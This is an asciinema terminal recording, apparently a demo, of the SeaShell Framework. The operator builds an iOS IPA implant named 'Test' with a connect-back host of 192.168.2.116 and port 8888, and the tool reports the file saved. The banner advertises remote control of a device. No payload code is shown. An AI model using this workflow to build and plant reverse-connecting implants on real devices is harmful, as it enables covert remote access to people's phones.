{"version": 2, "width": 90, "height": 30, "timestamp": 1703630631, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
[1, "o", "\u001b[1K\r\u001b[H\u001b[J"]
[1.8920460000000001, "o", "\u001b[1K\r\r\n\u001b[0m\u001b[0m\u001b[2m                          .8\r\n                        .888\r\n                      .8888'\r\n                     .8888'\r\n                     888'\r\n                     8'\r\n        .88888888888. .88888888888.\r\n     .8888888888888888888888888888888.\r\n   .8888888888888888888888888888888888.\r\n  .&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'\r\n  &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'\r\n  &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'\r\n  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:\r\n  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:\r\n  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:\r\n  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.\r\n  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.\r\n  `%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.\r\n   `00000000000000000000000000000000000'\r\n    `000000000000000000000000000000000'\r\n     `0000000000000000000000000000000'\r\n       `###########################'\r\n         `#######################'\r\n           `#########''########'\r\n             `\"\"\"\"\"\"'  `\"\"\"\"\"'\u001b[0m\u001b[0m\r\n\r\n"]
[1.892084, "o", "\u001b[1K\r\u001b[0m   --=[ \u001b[1m\u001b[77mSeaShell Framework 1.0.0\u001b[0m\r\n--==--[ Developed by EntySec (\u001b[4mhttps://entysec.com/\u001b[0m)\r\n   --=[ \u001b[32m5\u001b[0m modules | \u001b[32m0\u001b[0m plugins\u001b[0m\r\n"]
[1.892169, "o", "\u001b[1K\r\r\n\u001b[0mSeaShell Tip: \u001b[0mUse \u001b[32mplayer\u001b[0m to control device's media player\u001b[0m\u001b[0m\r\n\r\n"]
[1.892248, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m)> "]
[3.4465700000000004, "o", "i"]
[3.657662, "o", "p"]
[3.7977629999999998, "o", "a"]
[4.041833, "o", "\r\n"]
[4.042216, "o", "\u001b[1K\r\u001b[0m\u001b[1m\u001b[77m[>]\u001b[0m Application name (Mussel): "]
[4.673115, "o", "T"]
[4.988806, "o", "e"]
[5.259365, "o", "s"]
[5.346615, "o", "t"]
[6.032738, "o", "\r\n"]
[6.033141, "o", "\u001b[1K\r\u001b[0m\u001b[1m\u001b[77m[>]\u001b[0m Bundle ID (com.entysec.mussel): "]
[6.910087, "o", "c"]
[7.010726999999999, "o", "o"]
[7.227019, "o", "m"]
[7.584275, "o", "."]
[7.8952919999999995, "o", "t"]
[7.978752, "o", "e"]
[8.117319, "o", "s"]
[8.196818, "o", "t"]
[8.688143, "o", "."]
[9.067466, "o", "t"]
[9.168358, "o", "e"]
[9.358144, "o", "s"]
[9.437159, "o", "t"]
[9.946298, "o", "\r\n"]
[9.946636, "o", "\u001b[1K\r\u001b[0m\u001b[1m\u001b[77m[?]\u001b[0m Add application icon [y/N]: "]
[10.564191, "o", "n"]
[10.985294, "o", "\r\n"]
[10.985623, "o", "\u001b[1K\r\u001b[0m\u001b[1m\u001b[77m[>]\u001b[0m Host to connect back: "]
[12.034871, "o", "1"]
[12.181017, "o", "9"]
[12.329007, "o", "2"]
[12.599149, "o", "."]
[12.806447, "o", "1"]
[12.999816, "o", "6"]
[13.207341, "o", "8"]
[13.772751, "o", "."]
[13.973911, "o", "2"]
[14.161064, "o", "."]
[14.578204, "o", "1"]
[14.683862, "o", "1"]
[14.858114, "o", "6"]
[15.338721, "o", "\r\n"]
[15.33904, "o", "\u001b[1K\r\u001b[0m\u001b[1m\u001b[77m[>]\u001b[0m Port to connect back: "]
[15.922809999999998, "o", "8"]
[16.087333, "o", "8"]
[16.246123, "o", "8"]
[16.427236, "o", "8"]
[16.882196, "o", "\r\n"]
[16.882564, "o", "\u001b[1K\r\u001b[0m\u001b[1m\u001b[77m[>]\u001b[0m Path to save the IPA: "]
[17.66628, "o", "T"]
[17.918341, "o", "e"]
[18.067514, "o", "s"]
[18.168097, "o", "t"]
[18.719709, "o", "."]
[18.991375, "o", "i"]
[19.178341, "o", "p"]
[19.302719, "o", "a"]
[19.61955, "o", "\r\n"]
[19.675899, "o", "\u001b[1K\r\u001b[1m\u001b[32m[+]\u001b[0m IPA saved to Test.ipa!\r\n"]
[19.675919, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m)> "]
[22.406681, "o", ""]
